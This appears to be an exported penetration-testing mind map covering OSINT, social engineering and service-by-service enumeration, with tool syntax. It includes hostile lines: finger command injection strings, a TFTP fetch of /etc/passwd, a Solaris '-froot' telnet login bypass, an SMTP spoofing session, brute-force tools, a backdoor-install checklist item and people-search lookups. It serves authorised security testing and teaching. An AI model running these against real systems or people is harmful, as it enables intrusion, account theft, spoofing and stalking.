1. inurl:Citrix/AccessPlatform/auth/login.aspx
2. X11 port 6000+ open
2.1. X11 Enumeration
2.1.1. List open windows
2.1.2. Authentication Method
2.1.2.1. Xauth
2.1.2.2. Xhost
2.2. X11 Exploitation
2.2.1. xwd
2.2.1.1. xwd -display 192.168.0.1:0 -root -out 192.168.0.1.xpm
2.2.2. Keystrokes
2.2.2.1. Received
2.2.2.2. Transmitted
2.2.3. Screenshots
2.2.4. xhost +
2.3. Examine Configuration Files
2.3.1. /etc/Xn.hosts
2.3.2. /usr/lib/X11/xdm
2.3.2.1. Untitled
2.3.3. /usr/lib/X11/xdm/xsession
2.3.4. /usr/lib/X11/xdm/xsession-remote
2.3.5. /usr/lib/X11/xdm/xsession.0
2.3.6. /usr/lib/X11/xdm/xdm-config
2.3.6.1. DisplayManager*authorize:on
3. pwdump [-h][-o][-u][-p] machineName
4. Nabil contributed the AS/400 section.
5. Client Side Security
6. Back end files
6.1. .exe / .txt / .doc / .ppt / .pdf / .vbs / .pl / .sh / .bat / .sql / .xls / .mdb / .conf
7. Set objShell = CreateObject("WScript.Shell")
8. Check visible areas for sensitive information.
9. InitialProgram=c:\windows\system32\cmd.exe
10. txdns --verbose -fm wordlist.dic --server ip_address -rr SOA domain_name -h c:\hostlist.txt
11. http://secunia.com/advisories/search/?search=citrix
12. Pre-Inspection Visit - template
13. Network Footprinting (Reconnaissance) - The tester would attempt to gather as much information as possible about the selected network. Reconnaissance can take two forms, i.e. active and passive. A passive attack is always the best starting point, as this would normally defeat intrusion detection systems and other forms of protection afforded to the network. This would usually involve trying to discover publicly available information by utilising a web browser, visiting newsgroups etc. An active form would be more intrusive, may show up in audit logs, and may take the form of an attempted DNS zone transfer or a social engineering type of attack.
13.1. Untitled
13.1.1. Authoritative Bodies
13.1.1.1. IANA - Internet Assigned Numbers Authority
13.1.1.2. ICANN - Internet Corporation for Assigned Names and Numbers.
13.1.1.3. NRO - Number Resource Organisation
13.1.1.4. RIR - Regional Internet Registry
13.1.1.4.1. AFRINIC - African Network Information Centre
13.1.1.4.2. APNIC - Asia Pacific Network Information Centre
13.1.1.4.3. ARIN - American Registry for Internet Numbers
13.1.1.4.4. LACNIC - Latin America & Caribbean Network Information Centre
13.1.1.4.5. RIPE - Réseaux IP Européens - Network Coordination Centre
13.1.2. Websites
13.1.2.1. Central Ops
13.1.2.1.1. Domain Dossier
13.1.2.1.2. Email Dossier
13.1.2.2. DNS Stuff
13.1.2.2.1. Online DNS one-stop shop, with the ability to perform a great deal of disparate DNS type queries.
13.1.2.3. Fixed Orbit
13.1.2.3.1. Autonomous System lookups and other online tools available.
13.1.2.4. Geektools
13.1.2.5. IP2Location
13.1.2.5.1. Allows limited free IP lookups to be performed, displaying geolocation information, ISP details and other pertinent information.
13.1.2.6. Kartoo
13.1.2.6.1. Metasearch engine that visually presents its results.
13.1.2.7. MyIPNeighbors.com
13.1.2.7.1. Excellent site that gives you details of the domains sharing the IP queried and, conversely, IP to DNS resolution
13.1.2.8. My-IP-Neighbors.com
13.1.2.8.1. Excellent site that can be used if the above is down
13.1.2.9. myipneighbors.net
13.1.2.10. Netcraft
13.1.2.10.1. Online search tool allowing queries for host information.
13.1.2.11. Passive DNS Replication
13.1.2.11.1. Finds shared domains based on supplied IP addresses
13.1.2.11.2. Note: website utilised by the nmap hostmap.nse script
13.1.2.12. Robtex
13.1.2.12.1. Excellent website allowing DNS and AS lookups to be performed with a graphical display of the results with pointers, A, MX records and AS connectivity displayed.
13.1.2.12.2. Note: can be unreliable with old entries (use CentralOps to verify)
13.1.2.13. Traceroute.org
13.1.2.13.1. Website listing a large number of links to online traceroute resources.
13.1.2.14. Wayback Machine
13.1.2.14.1. Stores older versions of websites, making it a good comparison tool and excellent resource for previously removed data.
13.1.2.15. Whois.net
13.1.3. Tools
13.1.3.1. Cheops-ng
13.1.3.2. Country whois
13.1.3.3. Domain Research Tool
13.1.3.4. Firefox Plugins
13.1.3.4.1. AS Number
13.1.3.4.2. Shazou
13.1.3.4.3. Firecat Suite
13.1.3.5. Gnetutil
13.1.3.6. Goolag Scanner
13.1.3.7. Greenwich
13.1.3.8. Maltego
13.1.3.9. GTWhois
13.1.3.10. Sam Spade
13.1.3.11. Smart whois
13.1.3.12. SpiderFoot
13.2. Internet Search
13.2.1. General Information
13.2.1.1. Web Investigator
13.2.1.2. Tracesmart
13.2.1.3. Friends Reunited
13.2.1.4. eBay - profiles etc.
13.2.2. Financial
13.2.2.1. EDGAR - Company information, including real-time filings. US
13.2.2.2. Google Finance - General Finance Portal
13.2.2.3. Hoovers - Business Intelligence, Insight and Results. US and UK
13.2.2.4. Companies House UK
13.2.2.5. Land Registry UK
13.2.3. Phone book/ Electoral Roll Information
13.2.3.1. 123people
13.2.3.1.1. http://www.123people.co.uk/s/firstname+lastname/world
13.2.3.2. 192.com
13.2.3.2.1. Electoral Roll Search. UK
13.2.3.3. 411
13.2.3.3.1. Online White Pages and Yellow Pages. US
13.2.3.4. Untitled
13.2.3.4.1. Background Check, Phone Number Lookup, Trace email, Criminal record, Find People, cell phone number search, License Plate Search. US
13.2.3.5. BT.com. UK
13.2.3.5.1. Residential
13.2.3.5.2. Business
13.2.3.6. Pipl
13.2.3.6.1. Untitled
13.2.3.6.2. http://pipl.com/search/?Email=john%40example.com&CategoryID=4&Interface=1
13.2.3.6.3. http://pipl.com/search/?Username=????&CategoryID=5&Interface=1
13.2.3.7. Spokeo
13.2.3.7.1. http://www.spokeo.com/user?q=domain_name
13.2.3.7.2. http://www.spokeo.com/user?q=email_address
13.2.3.8. Yasni
13.2.3.8.1. http://www.yasni.co.uk/index.php?action=search&search=1&sh=&name=firstname+lastname&filter=Keyword
13.2.3.9. Zabasearch
13.2.3.9.1. People Search Engine. US
13.2.4. Generic Web Searching
13.2.4.1. Code Search
13.2.4.2. Forum Entries
13.2.4.3. Google Hacking Database
13.2.4.4. Google
13.2.4.4.1. Email Addresses
13.2.4.4.2. Contact Details
13.2.4.5. Newsgroups/forums
13.2.4.6. Blog Search
13.2.4.6.1. Yammer
13.2.4.6.2. Google Blog Search
13.2.4.6.3. Technorati
13.2.4.6.4. Jaiku
13.2.4.6.5. Present.ly
13.2.4.6.6. Twitter Network Browser
13.2.4.7. Search Engine Comparison/ Aggregator Sites
13.2.4.7.1. Clusty
13.2.4.7.2. Grokker
13.2.4.7.3. Zuula
13.2.4.7.4. Exalead
13.2.4.7.5. Delicious
13.2.5. Metadata Search
13.2.5.1. Untitled
13.2.5.1.1. MetaData Visualisation Sites
13.2.5.1.2. Tools
13.2.5.1.3. Wikipedia Metadata Search
13.2.6. Social/ Business Networks
13.2.6.1. Untitled
13.2.6.1.1. Africa
13.2.6.1.2. Australia
13.2.6.1.3. Belgium
13.2.6.1.4. Holland
13.2.6.1.5. Hungary
13.2.6.1.6. Iran
13.2.6.1.7. Japan
13.2.6.1.8. Korea
13.2.6.1.9. Poland
13.2.6.1.10. Russia
13.2.6.1.11. Sweden
13.2.6.1.12. UK
13.2.6.1.13. US
13.2.6.1.14. Assorted
13.2.7. Resources
13.2.7.1. OSINT
13.2.7.2. International Directory of Search Engines
13.3. DNS Record Retrieval from publicly available servers
13.3.1. Types of Information Records
13.3.1.1. SOA Records - Indicates the server that has authority for the domain.
13.3.1.2. MX Records - List of a host’s or domain’s mail exchanger server(s).
13.3.1.3. NS Records - List of a host’s or domain’s name server(s).
13.3.1.4. A Records - An address record that allows a computer name to be translated to an IP address. Each computer has to have this record for its IP address to be located via DNS.
13.3.1.5. PTR Records - Maps an IP address back to a host's domain name (reverse lookup).
13.3.1.6. SRV Records - Service location record.
13.3.1.7. HINFO Records - Host information record with CPU type and operating system.
13.3.1.8. TXT Records - Generic text record.
13.3.1.9. CNAME - A host's canonical name; allows additional names/ aliases to be used to locate a computer.
13.3.1.10. RP - Responsible person for the domain.
13.3.2. Database Settings
13.3.2.1. Version.bind
13.3.2.2. Serial
13.3.2.3. Refresh
13.3.2.4. Retry
13.3.2.5. Expiry
13.3.2.6. Minimum
13.3.3. Sub Domains
13.3.4. Internal IP ranges
13.3.4.1. Reverse DNS for IP Range
13.3.5. Zone Transfer
13.4. Social Engineering
13.4.1. Remote
13.4.1.1. Phone
13.4.1.1.1. Scenarios
13.4.1.1.2. Results
13.4.1.1.3. Contact Details
13.4.1.2. Email
13.4.1.2.1. Scenarios
13.4.1.2.2. Software
13.4.1.2.3. Results
13.4.1.2.4. Contact Details
13.4.1.3. Other
13.4.2. Local
13.4.2.1. Personas
13.4.2.1.1. Name
13.4.2.1.2. Phone
13.4.2.1.3. Email
13.4.2.1.4. Business Cards
13.4.2.2. Contact Details
13.4.2.2.1. Name
13.4.2.2.2. Phone number
13.4.2.2.3. Email
13.4.2.2.4. Room number
13.4.2.2.5. Department
13.4.2.2.6. Role
13.4.2.3. Scenarios
13.4.2.3.1. New IT employee
13.4.2.3.2. Fire Inspector
13.4.2.4. Results
13.4.2.5. Maps
13.4.2.5.1. Satellite Imagery
13.4.2.5.2. Building layouts
13.4.2.6. Other
13.5. Dumpster Diving
13.5.1. Rubbish Bins
13.5.2. Contract Waste Removal
13.5.3. eBay ex-stock sales (e.g. HDDs)
13.6. Web Site copy
13.6.1. httrack
13.6.2. teleport pro
13.6.3. Black Widow
14. Discovery & Probing - Enumeration can serve two distinct purposes in an assessment: OS fingerprinting, and identifying the remote applications being served. OS fingerprinting, or TCP/IP stack fingerprinting, is the process of determining the operating system being utilised on a remote host. This is carried out by analysing packets received from the host in question. There are two distinct ways to OS fingerprint: actively (i.e. nmap) or passively (i.e. scanrand). Passive OS fingerprinting determines the remote OS utilising only the packets received and does not require any packets to be sent. Active OS fingerprinting is very noisy: it requires packets to be sent to the remote host and waits for a reply (or lack thereof). Disparate OSs respond differently to certain types of packet (the response is governed by an RFC and by any proprietary responses the vendor, notably Microsoft, has enabled within the system), and so custom packets may be sent. Remote applications being served on a host can be determined from the open ports on that host. By port scanning it is then possible to build up a picture of what applications are running and tailor the test accordingly.
14.1. Default Port Lists
14.1.1. Windows
14.1.2. *nix
14.2. Enumeration tools and techniques - The vast majority can be used generically; however, certain bespoke applications require their own specific toolsets to be used. Default passwords are platform and vendor specific.
14.2.1. General Enumeration Tools
14.2.1.1. nmap
14.2.1.1.1. nmap -n -A -PN -p- -T Aggressive -iL nmap.targetlist -oX nmap.syn.results.xml
14.2.1.1.2. nmap -sU -PN -v -O -p 1-30000 -T polite -iL nmap.targetlist > nmap.udp.results
14.2.1.1.3. nmap -sV -PN -v -p 21,22,23,25,53,80,443,161 -iL nmap.targets > nmap.version.results
14.2.1.1.4. nmap -A -sS -PN -n --script:all ip_address --reason
14.2.1.1.5. grep "appears to be up" nmap_saved_filename | awk -F\( '{print $2}' | awk -F\) '{print $1}' > ip_list
14.2.1.2. netcat
14.2.1.2.1. nc -v -n IP_Address port
14.2.1.2.2. nc -v -w 2 -z IP_Address port_range/port_number
14.2.1.3. amap
14.2.1.3.1. amap -bqv 192.168.1.1 80
14.2.1.3.2. amap [-A|-B|-P|-W] [-1buSRHUdqv] [[-m] -o <file>] [-D <file>] [-t/-T sec] [-c cons] [-C retries] [-p proto] [-i <file>] [target port [port] ...]
14.2.1.4. xprobe2
14.2.1.4.1. xprobe2 192.168.1.1
14.2.1.5. sinfp
14.2.1.5.1. ./sinfp.pl -i -p
14.2.1.6. nbtscan
14.2.1.6.1. nbtscan [-v] [-d] [-e] [-l] [-t timeout] [-b bandwidth] [-r] [-q] [-s separator] [-m retransmits] (-f filename) | (<scan_range>)
14.2.1.7. hping
14.2.1.7.1. hping ip_address
14.2.1.8. scanrand
14.2.1.8.1. scanrand ip_address:all
14.2.1.9. unicornscan
14.2.1.9.1. unicornscan [options 'b:B:d:De:EFhi:L:m:M:pP:q:r:R:s:St:T:w:W:vVZ:'] IP_ADDRESS/CIDR_NET_MASK:S-E
14.2.1.10. netenum
14.2.1.10.1. netenum network/netmask timeout
14.2.1.11. fping
14.2.1.11.1. fping -a -d hostname/ (Network/Subnet_Mask)
14.2.2. Firewall Specific Tools
14.2.2.1. firewalk
14.2.2.1.1. firewalk -p [protocol] -d [destination_port] -s [source_port] [internal_IP] [gateway_IP]
14.2.2.2. ftester
14.2.2.2.1. On host 1: ./ftestd -i eth0 -v; on host 2: ./ftest -f ftest.conf -v -d 0.01; then ./freport ftest.log ftestd.log
14.2.3. Default Passwords (Examine list)
14.2.3.1. Passwords A
14.2.3.2. Passwords B
14.2.3.3. Passwords C
14.2.3.4. Passwords D
14.2.3.5. Passwords E
14.2.3.6. Passwords F
14.2.3.7. Passwords G
14.2.3.8. Passwords H
14.2.3.9. Passwords I
14.2.3.10. Passwords J
14.2.3.11. Passwords K
14.2.3.12. Passwords L
14.2.3.13. Passwords M
14.2.3.14. Passwords N
14.2.3.15. Passwords O
14.2.3.16. Passwords P
14.2.3.17. Passwords R
14.2.3.18. Passwords S
14.2.3.19. Passwords T
14.2.3.20. Passwords U
14.2.3.21. Passwords V
14.2.3.22. Passwords W
14.2.3.23. Passwords X
14.2.3.24. Passwords Y
14.2.3.25. Passwords Z
14.2.3.26. Passwords (Numeric)
14.3. Active Hosts
14.3.1. Open TCP Ports
14.3.2. Closed TCP Ports
14.3.3. Open UDP Ports
14.3.4. Closed UDP Ports
14.3.5. Service Probing
14.3.5.1. SMTP Mail Bouncing
14.3.5.2. Banner Grabbing
14.3.5.2.1. Other
14.3.5.2.2. HTTP
14.3.5.2.3. HTTPS
14.3.5.2.4. SMTP
14.3.5.2.5. POP3
14.3.5.2.6. FTP
14.3.6. ICMP Responses
14.3.6.1. Type 3 (Port Unreachable)
14.3.6.2. Type 8 (Echo Request)
14.3.6.3. Type 13 (Timestamp Request)
14.3.6.4. Type 15 (Information Request)
14.3.6.5. Type 17 (Subnet Address Mask Request)
14.3.6.6. Responses from broadcast address
14.3.7. Source Port Scans
14.3.7.1. TCP/UDP 53 (DNS)
14.3.7.2. TCP 20 (FTP Data)
14.3.7.3. TCP 80 (HTTP)
14.3.7.4. TCP/UDP 88 (Kerberos)
14.3.8. Firewall Assessment
14.3.8.1. Firewalk
14.3.8.2. TCP/UDP/ICMP responses
14.3.9. OS Fingerprint
15. Enumeration
15.1. Daytime port 13 open
15.1.1. nmap nse script
15.1.1.1. daytime
15.2. FTP port 21 open
15.2.1. Fingerprint server
15.2.1.1. telnet ip_address 21 (Banner grab)
15.2.1.2. Run command ftp ip_address
15.2.1.3. [email protected]
15.2.1.4. Check for anonymous access
15.2.1.4.1. ftp ip_address - Username: anonymous OR anon; Password: [email protected]
15.2.2. Password guessing
15.2.2.1. Hydra brute force
15.2.2.2. medusa
15.2.2.3. Brutus
15.2.3. Examine configuration files
15.2.3.1. ftpusers
15.2.3.2. ftp.conf
15.2.3.3. proftpd.conf
15.2.4. MiTM
15.2.4.1. pasvagg.pl
15.3. SSH port 22 open
15.3.1. Fingerprint server
15.3.1.1. telnet ip_address 22 (banner grab)
15.3.1.2. scanssh
15.3.1.2.1. scanssh -p -r -e excludes random(no.)/Network_ID/Subnet_Mask
15.3.2. Password guessing
15.3.2.1. ssh root@ip_address
15.3.2.2. guess-who
15.3.2.2.1. ./b -l username -h ip_address -p 22 -2 < password_file_location
15.3.2.3. Hydra brute force
15.3.2.4. brutessh
15.3.2.5. Ruby SSH Bruteforcer
15.3.3. Examine configuration files
15.3.3.1. ssh_config
15.3.3.2. sshd_config
15.3.3.3. authorized_keys
15.3.3.4. ssh_known_hosts
15.3.3.5. .shosts
15.3.4. SSH Client programs
15.3.4.1. tunnelier
15.3.4.2. winsshd
15.3.4.3. putty
15.3.4.4. winscp
15.4. Telnet port 23 open
15.4.1. Fingerprint server
15.4.1.1. telnet ip_address
15.4.1.1.1. Common Banner List (OS: Banner)
15.4.1.1.1.1. Solaris 8: SunOS 5.8
15.4.1.1.1.2. Solaris 2.6: SunOS 5.6
15.4.1.1.1.3. Solaris 2.4 or 2.5.1: Unix(r) System V Release 4.0 (hostname)
15.4.1.1.1.4. SunOS 4.1.x: SunOS Unix (hostname)
15.4.1.1.1.5. FreeBSD: FreeBSD/i386 (hostname) (ttyp1)
15.4.1.1.1.6. NetBSD: NetBSD/i386 (hostname) (ttyp1)
15.4.1.1.1.7. OpenBSD: OpenBSD/i386 (hostname) (ttyp1)
15.4.1.1.1.8. Red Hat 8.0: Red Hat Linux release 8.0 (Psyche)
15.4.1.1.1.9. Debian 3.0: Debian GNU/Linux 3.0 / hostname
15.4.1.1.1.10. SGI IRIX 6.x: IRIX (hostname)
15.4.1.1.1.11. IBM AIX 4.1.x: AIX Version 4 (C) Copyrights by IBM and by others 1982, 1994.
15.4.1.1.1.12. IBM AIX 4.2.x or 4.3.x: AIX Version 4 (C) Copyrights by IBM and by others 1982, 1996.
15.4.1.1.1.13. Nokia IPSO: IPSO (hostname) (ttyp0)
15.4.1.1.1.14. Cisco IOS: User Access Verification
15.4.1.1.1.15. Livingston ComOS: ComOS - Livingston PortMaster
15.4.1.2. telnetfp
15.4.2. Password Attack
15.4.2.1. Untitled
15.4.2.2. Hydra brute force
15.4.2.3. Brutus
15.4.2.4. telnet -l "-froot" hostname (Solaris 10+)
15.4.3. Examine configuration files
15.4.3.1. /etc/inetd.conf
15.4.3.2. /etc/xinetd.d/telnet
15.4.3.3. /etc/xinetd.d/stelnet
15.5. Sendmail Port 25 open
15.5.1. Fingerprint server
15.5.1.1. telnet ip_address 25 (banner grab)
15.5.2. Mail Server Testing
15.5.2.1. Enumerate users
15.5.2.1.1. VRFY username (verifies if username exists - enumeration of accounts)
15.5.2.1.2. EXPN username (verifies if username is valid - enumeration of accounts)
15.5.2.2. Mail Spoof Test
15.5.2.2.1. SMTP session (one command per line)
15.5.2.2.1.1. HELO anything
15.5.2.2.1.2. MAIL FROM: spoofed_address
15.5.2.2.1.3. RCPT TO: valid_mail_account
15.5.2.2.1.4. DATA
15.5.2.2.1.5. . (a single dot on its own line ends the message body)
15.5.2.2.1.6. QUIT
15.5.2.3. Mail Relay Test
15.5.2.3.1. Untitled
15.5.3. Examine Configuration Files
15.5.3.1. sendmail.cf
15.5.3.2. submit.cf
15.6. DNS port 53 open
15.6.1. Fingerprint server/ service
15.6.1.1. host
15.6.1.1.1. host [-aCdlnrTwv] [-c class] [-N ndots] [-R number] [-t type] [-W wait] name [server]
15.6.1.1.1.1. -v Verbose format
15.6.1.1.1.2. -t (query type) Allows a user to specify a record type, i.e. A, NS, or PTR.
15.6.1.1.1.3. -a Same as -t ANY.
15.6.1.1.1.4. -l Zone transfer (if allowed).
15.6.1.1.1.5. -f Save to a specified filename.
15.6.1.2. nslookup
15.6.1.2.1. nslookup [ -option ... ] [ host-to-find | - [ server ]]
15.6.1.3. dig
15.6.1.3.1. dig [ @server ] [-b address ] [-c class ] [-f filename ] [-k filename ] [-p port# ] [-t type ] [-x addr ] [-y name:key ] [-4 ] [-6 ] [name ] [type ] [class ] [queryopt... ]
15.6.1.4. whois
15.6.1.4.1. -h Use the named host to resolve the query
15.6.1.4.2. -a Use ARIN to resolve the query
15.6.1.4.3. -r Use RIPE to resolve the query
15.6.1.4.4. -p Use APNIC to resolve the query
15.6.1.4.5. -Q Perform a quick lookup
15.6.2. DNS Enumeration
15.6.2.1. Bile Suite
15.6.2.1.1. perl BiLE.pl [website] [project_name]
15.6.2.1.2. perl BiLE-weigh.pl [website] [input file]
15.6.2.1.3. perl vet-IPrange.pl [input file] [true domain file] [output file] <range>
15.6.2.1.4. perl vet-mx.pl [input file] [true domain file] [output file]
15.6.2.1.5. perl exp-tld.pl [input file] [output file]
15.6.2.1.6. perl jarf-dnsbrute [domain_name] (brutelevel) [file_with_names]
15.6.2.1.7. perl qtrace.pl [ip_address_file] [output_file]
15.6.2.1.8. perl jarf-rev [subnetblock] [nameserver]
15.6.2.2. txdns
15.6.2.2.1. txdns -rt -t domain_name
15.6.2.2.2. txdns -x 50 -bb domain_name
15.6.2.3. nmap nse scripts
15.6.2.3.1. dns-random-srcport
15.6.2.3.2. dns-random-txid
15.6.2.3.3. dns-recursion
15.6.2.3.4. dns-zone-transfer
15.6.3. Examine Configuration Files
15.6.3.1. host.conf
15.6.3.2. resolv.conf
15.6.3.3. named.conf
15.7. TFTP port 69 open
15.7.1. TFTP Enumeration
15.7.1.1. tftp ip_address PUT local_file
15.7.1.2. tftp ip_address GET conf.txt (or other files)
15.7.1.3. Solarwinds TFTP server
15.7.1.4. tftp -i <IP> GET /etc/passwd (old Solaris)
15.7.2. TFTP Bruteforcing
15.7.2.1. TFTP bruteforcer
15.7.2.2. Cisco-Torch
15.8. Finger Port 79 open
15.8.1. User enumeration
15.8.1.1. finger 'a b c d e f g h' @example.com
15.8.1.2. finger [email protected]
15.8.1.3. finger [email protected]
15.8.1.4. finger [email protected]
15.8.1.5. finger [email protected]
15.8.1.6. finger **@example.com
15.8.1.7. finger [email protected]
15.8.1.8. finger @example.com
15.8.1.9. nmap nse script
15.8.1.9.1. finger
15.8.2. Command execution
15.8.2.1. finger "|/bin/[email protected]"
15.8.2.2. finger "|/bin/ls -a /@example.com"
15.8.3. Finger Bounce
15.8.3.1. finger user@host@victim
15.8.3.2. finger @internal@external
15.9. Web Ports 80,8080 etc. open
15.9.1. Fingerprint server
15.9.1.1. Telnet ip_address port
15.9.1.2. Firefox plugins
15.9.1.2.1. All
15.9.1.2.2. Specific
15.9.2. Crawl website
15.9.2.1. lynx [options] startfile/URL (options include -traversal, -crawl, -dump, -image_links, -source)
15.9.2.2. httprint
15.9.2.3. Metagoofil
15.9.2.3.1. metagoofil.py -d [domain] -l [no. of] -f [type] -o results.html
15.9.3. Web Directory enumeration
15.9.3.1. Nikto
15.9.3.1.1. nikto [-h target] [options]
15.9.3.2. DirBuster
15.9.3.3. Wikto
15.9.3.4. Goolag Scanner
15.9.4. Vulnerability Assessment
15.9.4.1. Manual Tests
15.9.4.1.1. Default Passwords
15.9.4.1.2. Install Backdoors
15.9.4.1.3. Method Testing
15.9.4.1.4. Upload Files
15.9.4.1.5. View Page Source
15.9.4.1.6. Input Validation Checks
15.9.4.1.7. Automated table and column iteration
15.9.4.2. Vulnerability Scanners
15.9.4.2.1. Acunetix
15.9.4.2.2. Grendelscan
15.9.4.2.3. NStealth
15.9.4.2.4. Obiwan III
15.9.4.2.5. w3af
15.9.4.3. Specific Applications/ Server Tools
15.9.4.3.1. Domino
15.9.4.3.2. Joomla
15.9.4.3.3. aspaudit.pl
15.9.4.3.4. Vbulletin
15.9.4.3.5. ZyXel
15.9.5. Proxy Testing
15.9.5.1. Burpsuite
15.9.5.2. Crowbar
15.9.5.3. Interceptor
15.9.5.4. Paros
15.9.5.5. Requester Raw
15.9.5.6. Suru
15.9.5.7. WebScarab
15.9.6. Examine configuration files
15.9.6.1. Generic
15.9.6.1.1. Examine httpd.conf/ windows config files
15.9.6.2. JBoss
15.9.6.2.1. JMX Console http://<IP>:8080/jmx-console/
15.9.6.3. Joomla
15.9.6.3.1. configuration.php
15.9.6.3.2. diagnostics.php
15.9.6.3.3. joomla.inc.php
15.9.6.3.4. config.inc.php
15.9.6.4. Mambo
15.9.6.4.1. configuration.php
15.9.6.4.2. config.inc.php
15.9.6.5. Wordpress
15.9.6.5.1. setup-config.php
15.9.6.5.2. wp-config.php
15.9.6.6. ZyXel
15.9.6.6.1. /WAN.html (contains PPPoE ISP password)
15.9.6.6.2. /WLAN_General.html and /WLAN.html (contains WEP key)
15.9.6.6.3. /rpDyDNS.html (contains DDNS credentials)
15.9.6.6.4. /Firewall_DefPolicy.html (Firewall)
15.9.6.6.5. /CF_Keyword.html (Content Filter)
15.9.6.6.6. /RemMagWWW.html (Remote MGMT)
15.9.6.6.7. /rpSysAdmin.html (System)
15.9.6.6.8. /LAN_IP.html (LAN)
15.9.6.6.9. /NAT_General.html (NAT)
15.9.6.6.10. /ViewLog.html (Logs)
15.9.6.6.11. /rpFWUpload.html (Tools)
15.9.6.6.12. /DiagGeneral.html (Diagnostic)
15.9.6.6.13. /RemMagSNMP.html (SNMP Passwords)
15.9.6.6.14. /LAN_ClientList.html (Current DHCP Leases)
15.9.6.6.15. Config Backups
15.9.7. Examine web server logs
15.9.7.1. c:\winnt\system32\Logfiles\W3SVC1
15.9.7.1.1. awk -F " " '{print $3,$11}' filename | sort | uniq
15.9.8. References
15.9.8.1. White Papers
15.9.8.1.1. Cross Site Request Forgery: An Introduction to a Common Web Application Weakness
15.9.8.1.2. Attacking Web Service Security: Message Oriented Madness, XML Worms and Web Service Security Sanity
15.9.8.1.3. Blind Security Testing - An Evolutionary Approach
15.9.8.1.4. Command Injection in XML Signatures and Encryption
15.9.8.1.5. Input Validation Cheat Sheet
15.9.8.1.6. SQL Injection Cheat Sheet
15.9.8.2. Books
15.9.8.2.1. Hacking Exposed Web 2.0
15.9.8.2.2. Hacking Exposed Web Applications
15.9.8.2.3. The Web Application Hacker's Handbook
15.9.9. Exploit Frameworks
15.9.9.1. Brute-force Tools
15.9.9.1.1. Acunetix
15.9.9.2. Metasploit
15.9.9.3. w3af
15.10. Portmapper port 111 open
15.10.1. rpcdump.py
15.10.1.1. rpcdump.py username:password@IP_Address port/protocol (i.e. 80/HTTP)
15.10.2. rpcinfo
15.10.2.1. rpcinfo [options] IP_Address
15.11. NTP Port 123 open
15.11.1. NTP Enumeration
15.11.1.1. ntpdc -c monlist IP_ADDRESS
15.11.1.2. ntpdc -c sysinfo IP_ADDRESS
15.11.1.3. ntpq
15.11.1.3.1. host
15.11.1.3.2. hostname
15.11.1.3.3. ntpversion
15.11.1.3.4. readlist
15.11.1.3.5. version
15.11.2. Examine configuration files
15.11.2.1. ntp.conf
15.11.3. nmap nse script
15.11.3.1. ntp-info
15.12. NetBIOS Ports 135-139,445 open
15.12.1. NetBIOS enumeration
15.12.1.1. Enum
15.12.1.1.1. enum <-UMNSPGLdc> <-u username> <-p password> <-f dictfile> <hostname|ip>
15.12.1.2. Null Session
15.12.1.2.1. net use \\192.168.1.1\ipc$ "" /u:""
15.12.1.3. Smbclient
15.12.1.3.1. smbclient -L //server/share password options
15.12.1.4. Superscan
15.12.1.4.1. Enumeration tab.
15.12.1.5. user2sid/sid2user
15.12.1.6. Winfo
15.12.2. NetBIOS brute force
15.12.2.1. Hydra
15.12.2.2. Brutus
15.12.2.3. Cain & Abel
15.12.2.4. getacct
15.12.2.5. NAT (NetBIOS Auditing Tool)
15.12.3. Examine Configuration Files
15.12.3.1. Smb.conf
15.12.3.2. lmhosts
15.13. SNMP port 161 open
15.13.1. Default Community Strings
15.13.1.1. public
15.13.1.2. private
15.13.1.3. cisco
15.13.1.3.1. cable-docsis
15.13.1.3.2. ILMI
15.13.2. MIB enumeration
15.13.2.1. Windows NT
15.13.2.1.1. .1.3.6.1.2.1.1.5 Hostnames
15.13.2.1.2. .1.3.6.1.4.1.77.1.4.2 Domain Name
15.13.2.1.3. .1.3.6.1.4.1.77.1.2.25 Usernames
15.13.2.1.4. .1.3.6.1.4.1.77.1.2.3.1.1 Running Services
15.13.2.1.5. .1.3.6.1.4.1.77.1.2.27 Share Information
15.13.2.2. Solarwinds MIB walk
15.13.2.3. Getif
15.13.2.4. snmpwalk
15.13.2.4.1. snmpwalk -v <Version> -c <Community string> <IP>
15.13.2.5. Snscan
15.13.2.6. Applications
15.13.2.6.1. ZyXel
15.13.2.7. nmap nse script
15.13.2.7.1. snmp-sysdescr
15.13.3. SNMP Bruteforce
15.13.3.1. onesixtyone
15.13.3.1.1. onesixtyone -c SNMP.wordlist <IP>
15.13.3.2. cat
15.13.3.2.1. ./cat -h <IP> -w SNMP.wordlist
15.13.3.3. Solarwinds SNMP Brute Force
15.13.3.4. ADMsnmp
15.13.3.5. nmap nse script
15.13.3.5.1. snmp-brute
15.13.4. Examine SNMP Configuration files
15.13.4.1. snmp.conf
15.13.4.2. snmpd.conf
15.13.4.3. snmp-config.xml
15.14. LDAP Port 389 Open
15.14.1. ldap enumeration
15.14.1.1. ldapminer
15.14.1.1.1. ldapminer -h ip_address -p port (not required if default) -d
15.14.1.2. luma
15.14.1.2.1. Gui based tool
15.14.1.3. ldp
15.14.1.3.1. Gui based tool
15.14.1.4. openldap
15.14.1.4.1. ldapsearch [-n] [-u] [-v] [-k] [-K] [-t] [-A] [-L[L[L]]] [-M[M]] [-d debuglevel] [-f file] [-D binddn] [-W] [-w passwd] [-y passwdfile] [-H ldapuri] [-h ldaphost] [-p ldapport] [-P 2|3] [-b searchbase] [-s base|one|sub] [-a never|always|search|find] [-l timelimit] [-z sizelimit] [-O security-properties] [-I] [-U authcid] [-R realm] [-x] [-X authzid] [-Y mech] [-Z[Z]] filter [attrs...]
15.14.1.4.2. ldapadd [-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-h ldaphost][-p ldap-port][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]
15.14.1.4.3. ldapdelete [-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-f file][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-P 2|3][-p ldapport][-O security-properties][-U authcid][-R realm][-x][-I][-Q] [-X authzid][-Y mech][-Z[Z]][dn]
15.14.1.4.4. ldapmodify [-a][-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]
